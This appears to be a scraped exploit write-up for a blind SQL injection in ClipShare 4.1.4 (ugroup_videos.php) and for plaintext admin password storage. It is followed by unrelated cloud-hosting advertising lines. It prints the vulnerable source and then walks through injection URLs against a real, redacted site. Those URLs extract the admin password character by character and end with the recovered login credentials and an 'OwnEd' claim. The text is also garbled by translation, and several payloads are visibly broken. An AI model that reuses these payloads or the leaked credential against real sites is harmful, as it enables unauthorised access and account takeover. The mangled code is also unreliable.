Affected program: ClipShare-Video Sharing Community Script 4.1.4 Official Website: http://www.clip-share.com Defect type: Blind SQL injection & Plaintext Password. AFAIK all versions problem: Official Demo is also vulnerable: http://www.clipsharedemo.com/ugroup_videos.php?urlkey=%27%20and%203=%273 Latest monitoring: 13 March 2013 tip: To exploit this vulnerability MAGIC_QUOTES_GPC directive must be turned off on server side. (php. ini) defect file: // ugroup_videos.php ================================ begin of ugroup_videos.php ====== =========================================================<? Php/************************** | Software Name: clipShare-Video Sharing Community Script | Software Author: Clip-Share.Com/ScriptXperts. com | Website: http://www.clip-share.com | E-mail: office@clip-share.com | **************************** | This source file is subject to the ClipShare End -User License Agreement, available online at: | http://www.clip-share.com Video-sharing-script-eula.html | By using this software, you acknowledge having read this Agreement and agree to be bound thereby. | ***************************** | Copyright (c) 2006-2007 Clip-Share.com. all rights reserved. | *************************** require ('include/config. php '); require ('include/function. php '); $ urlkey = (isset ($ _ REQUEST ['urlkey'])? $ _ REQUEST ['urlkey']: NULL; $ uid = (isset ($ _ REQUEST ['uid']) & is_numeric ($ _ REQUEST ['uid'])? $ _ REQUEST ['uid']: NULL; $ SQL = "SELECT * from group_own WHERE gurl = '". $ urlkey. "'limit 1"; $ rs = $ conn-> Execute ($ SQL); if ($ rs-> recordcount ()> 0) {STemplate :: assign ('groupname', $ rs-> fields [gname]); // paging starts $ page = (isset ($ _ REQUEST ['page']) & is_numeric ($ _ REQUEST ['page'])? $ _ REQUEST ['page']: NULL; $ SQL = "SELECT count (*) as total from group_mem WHERE GID = '". $ rs-> fields ['gid']. "'limit 1"; $ ars = $ conn-> Execute ($ SQL ); $ total = ($ ars-> fields ['Total'] <= $ config ['total _ per_ini '])? $ Ars-> fields ['Total']: $ config ['total _ per_ini ']; $ tpage = ceil ($ total/$ config ['items _ per_page']); $ spage = ($ tpage = 0 )? $ Tpage + 1: $ tpage; $ startfrom = ($ page-1) * $ config ['items _ per_page ']; $ SQL = "SELECT m. *, s. addtime from group_mem as m, signup as s WHERE m. MID = s. UID and m. GID = '". $ rs-> fields ['gid']. "'limit $ startfrom ,". $ config ['items _ per_page ']; $ rs = $ conn-> execute ($ SQL); if ($ rs-> recordcount ()> 0) $ vdo = $ rs-> getrows (); $ start_num = $ startfrom + 1; $ end_num = $ startfrom + $ rs-> recordcount (); $ page_link = ''; $ type = (Isset ($ _ REQUEST ['type']) & $ _ REQUEST ['type']! = '')? "& Type = ". $ _ REQUEST ['type']: NULL; for ($ k = 1; $ k <= $ tpage; $ k ++) $ page_link. = "<a href = 'group _ members. php? UID = ". $ uid. "& page = ". $ k. $ type. "'> $ k </a> & nbsp;"; // end paging} STemplate: assign ('err', $ err); STemplate :: assign ('msg ', $ msg); STemplate: assign ('page', $ page); STemplate: assign ('start _ num', $ start_num); STemplate:: assign ('end _ num', $ end_num); STemplate: assign ('page _ link', $ page_link); STemplate: assign ('Total ', $ total); STemplate: assign ('answers', $ vdo); STemplate: assign ('head _ bottom ', "group Links. tpl "); STemplate: display ('head1. tpl '); STemplate: display ('err _ msg. tpl '); STemplate: display ('ugroup _ members. tpl '); STemplate: display ('footer. tpl '); STemplate: gzip_encode ();?> =============================== End of ugroup_videos.php =========================== ======= Real exploitation example: _ REMOVED _/ugroup_videos.php? Urlkey = 1 'order by 14 -- 3 = '3 http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (5 = 5, 0, 3) -- 3 = '3 // on true // RETURNS: NORMAL PAGE http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (5 = 5, 0, 3) -- 3 = '3 // on false // returns nothing. (White Page) http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (5 = 2, 0, 3) -- 3 = '3 Plaintext password: // siteadmin/login. php ============== begin of siteadmin/login. php =====================================<? Php include ('.. /include/config. php '); if (isset ($ _ POST ['submit _ login']) {$ username = trim ($ _ POST ['username']); $ password = trim ($ _ POST ['Password']); if ($ username = ''or $ password = '') {$ err = 'Please provide a username and password! ';} Else {$ access = false; $ SQL = "SELECT soption FROM sconfig WHERE soption = 'admin _ name' AND svalue = '". mysql_real_escape_string ($ username ). "'"; $ conn-> execute ($ SQL); if ($ conn-> Affected_Rows () = 1) {$ SQL = "SELECT soption FROM sconfig WHERE soption = 'admin _ pass' AND svalue = '". mysql_real_escape_string ($ password ). "'"; $ conn-> execute ($ SQL); if ($ conn-> Affected_Rows () = 1) {$ access = true ;}} // SNIP // ================ end of siteadmin/login. php ==========================================/// TRUE http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (count ('svalue ')! = 0, 0, 3) from sconfig) -- 3 = '3 80 user: http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (count ('svalue') = 80, 0, 3) from sconfig) -- 3 = '3 http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (count (0) = 1, 0, 3) from sconfig where soption = 'admin _ name') -- 3 = '3 Passi cekirik: http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (length (svalue) = '11',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 11 simvolludur pass. ========================================================== ==================== 1-ci simvol: o http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = 'O',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================== 2-ci simvol: ( http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) =' (',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================ 3-cu simvol: 2 http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = '2',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================ 4-cu simvol: n http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = 'n',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================ 5-ci simvol: @ http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue, 5, 1) =' @ ',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== =================================== 6-ci simvol: B http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue, 6, 1) =' B ',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ===================================7-ci simvol: % (yoxla sonra) http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) =' % ',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== =================================== 8-ci simvol: h http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = 'h',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================== 9-cu simvol: a http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue, 9, 1) = 'A',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================== 10-cu simvol: 5 http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = '5',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================== 11-ci simvol: 1 http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = '1',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 ======================================== ================================== http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = 'o (2n @ B % ha51',) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 // Parol duzdur tamamile ascii representasionu yoxlamaga ehtiyyac yoxdur. (plaintext oldugundan subhe yaradirdi) http://_REMOVED_/ugroup_videos.php?urlkey=1 'Or (select if (mid (svalue,) = 0x6F28326E40622568613531,) from sconfig where soption = 'admin _ pass' limit 1 offset 0) -- 3 = '3 pass: o (2n @ B % ha51 http://www.bkjia.com /Ugroup_videos.php? Urlkey = 1' or (select if (svalue = 'admin',) from sconfig where soption = 'admin _ name' limit 1 offset 0) -- 3 = '3 login: admin pass: o (2n @ B % ha51 http://_REMOVED_/siteadmin/ OwnEd. tested Version: Tuesday, March 12,201 3 | Version: 4.1.4 | Username: admin | Logout Copyright©2006-2008 ClipShare. All rights reserved./AkaStep
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
